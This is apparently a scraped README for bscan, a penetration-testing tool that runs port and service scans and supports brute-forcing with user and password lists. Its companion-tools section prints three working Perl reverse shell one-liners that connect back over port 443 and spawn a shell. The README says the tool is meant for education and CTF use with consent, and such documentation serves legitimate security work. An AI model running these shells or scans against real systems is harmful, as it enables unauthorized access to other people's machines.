Need help with bscan?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

229 Stars 36 Forks MIT License 247 Commits 3 Opened issues


an asynchronous target enumeration tool

Services available


Need anything else?

Contributors list

# 206,180
241 commits


:mag: an asynchronous target enumeration tool :mag_right:

travis status pypi built for kali linux python version


is a command-line utility to perform active information gathering and service enumeration. At its core,
asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.


is intended for educational purposes and events such as CTFs only and should never be run on machines and/or networks without explicit prior consent. This code is released under the MIT license.


was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed. There's a few different types of packaged releases and ways to install them.

The easiest way to get up and running is to install the appropriate single-file executable version of the program for your operating system (no Python installation required): ```sh

on Linux (i.e., Kali)

wget -O bscan

on Windows

powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; wget '' -OutFile 'bscan.exe'"

to download a specific version, use the following pattern

wget -O bscan ```

You can also download the latest packaged version from PyPI (note that this requires an existing Python 3.6+ installation):

pip install bscan

Similarly, you could get the bleeding-edge version from version control:

pip install

Basic Usage

has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example: ```sh $ bscan \

--max-concurrency 3 \ --patterns [Mm]icrosoft \ --status-interval 10 \ --verbose-status \ ```

What's going on here? *

--max-concurrency 3
means that no more than 3 concurrent scan subprocesses will be run at a time *
--patterns [Mm]icrosoft
defines a custom regex pattern with which to highlight matches in the generated scan output *
--status-interval 10
to print runtime status updates every 10 seconds *
means that each of these status updates will print details of all currently-running scan subprocesses *
is the host upon which we want to enumerate

also relies on some additional configuration files. The default files can be found in the
directory and serve the following purposes: *
specifies the regex patterns to be highlighted in console output when matched with scan output *
specifies the installed programs that
plans on using *
defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output *
defines the scans be run on the target(s) on a per-service basis

Detailed Options

Here's what you should see when running

bscan --help
: ``` usage: bscan [OPTIONS] targets

_ | |__ ___ ___ __ _ _ __ | '_ \/ |/ _/ _` | ' \ | |) _ \ ( (| | | | | |./|/__,|| |_|

an asynchronous service enumeration tool

positional arguments: targets the targets and/or networks on which to perform enumeration

optional arguments: -h, --help show this help message and exit --brute-pass-list F filename of password list to use for brute-forcing --brute-user-list F filename of user list to use for brute-forcing --cmd-print-width I the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80) --config-dir D the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program --hard force overwrite of existing directories --max-concurrency I maximum integer number of subprocesses permitted to be running concurrently (defaults to 20) --no-program-check disable checking the presence of required system programs --no-file-check disable checking the presence of files such as configured wordlists --no-service-scans disable running scans on discovered services --output-dir D the base directory in which to write output files --patterns [ [ ...]] regex patterns to highlight in output text --ping-sweep enable ping sweep filtering of hosts from a network range before running more intensive scans --quick-only whether to only run the quick scan (and not include the thorough scan over all ports) --qs-method S the method for performing the initial TCP port scan; must correspond to a configured port scan --status-interval I integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30) --ts-method S the method for performing the thorough TCP port scan; must correspond to a configured port scan --udp whether to run UDP scans --udp-method S the method for performing the UDP port scan; must correspond to a configured port scan --verbose-status whether to print verbose runtime status updates, based on frequency specified by

flag --version program version --web-word-list F the wordlist to use for scans ```

Companion Tools

The main

program ships with two utility programs (
) to make your life a little easier when looking for wordlists and trying to open reverse shells.

is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:
$ bscan-wordlists --find "*win*"
bscan-wordlists --help
to explore other options.

is a program that will generate a variety of reverse shell one-liners with
fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to
on port
: ```sh $ bscan-shells --port 443 | grep -i -A1 perl perl for windows perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl with /bin/sh perl -e 'use Socket;$i="";$p=443;socket(S,PFINET,SOCKSTREAM,getprotobyname("tcp"));if(connect(S,sockaddrin($p,inetaton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl without /bin/sh perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``

Note that
pulls these commands from the [
](bscan/configuration/reverse-shells.toml) configuration file. Try
bscan-shells --help` to explore other options.


Start by setting up a new development environment and installing the requirements (using

): ```sh

setup the environment

mkvirtualenv -p $(which python3) bscan-dev workon bscan-dev

get the deps

pip install -r dev-requirements.txt ```

Lint and type-check the project (these are run on Travis, too):

flake8 . && mypy bscan

When it's time to package a new release: ```sh

build the single-file executable

pyinstaller bscan.spec

build source and wheel distributions

python bdist_wheel sdist

run post-build checks

twine check dist/*

upload to PyPI

twine upload dist/* ```

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.